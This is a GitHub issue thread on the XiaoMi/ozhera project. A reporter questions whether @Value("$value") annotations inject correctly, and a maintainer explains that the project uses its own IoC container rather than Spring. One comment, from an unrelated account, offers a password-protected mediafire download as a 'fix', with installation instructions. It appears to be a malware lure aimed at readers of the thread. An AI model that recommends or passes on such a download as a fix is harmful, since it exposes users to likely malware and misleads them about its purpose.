### ISSUE TITLE
[Bug] There are some issues with the usage of  annotations.

### ISSUE THREAD

**Issue by psxjoy** [XiaoMi/ozhera#425]
While using the project, I found that some `@Value` annotations don't appear to be injecting data as expected. After checking the relevant source code, I identified some potential issues.
![image](https://github.com/user-attachments/assets/42e34de3-efd1-4507-b93d-304255b8b023)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wtt40122** [comment]
Was the injection unsuccessful?

**Comment by psxjoy** [comment]
Apologies, I didn't check all the injection cases. 
Typically, a correct injection format should be `@Value("${value}")`. If it's written as `@Value("$value")`, Spring won't interpret this as a placeholder but will assign the string "$value" directly to the variable. 

Or am I misunderstanding? Are there scenarios where you actually need to assign the string directly without parsing the placeholder?

抱歉我沒有全部检查所有的注入。但是 正常的 注入应该是 `@Value("${value}")`这种形式？如果写成 `@Value("$value")`，Spring 不会解析这个占位符，而是会将字符串 `"$value"` 直接赋值给变量。
或者是我的理解有问题，一些内容就是需要不解析占位符，而是直接将字符串赋值？

**Comment by wtt40122** [comment]
我们这个项目不是基于spring开发的，底层用的是一套自研的ioc容器，所以它支持截图中的注入

**Comment by psxjoy** [comment]
I apologize for my mistake. I will ***close this issue and the related PR***.
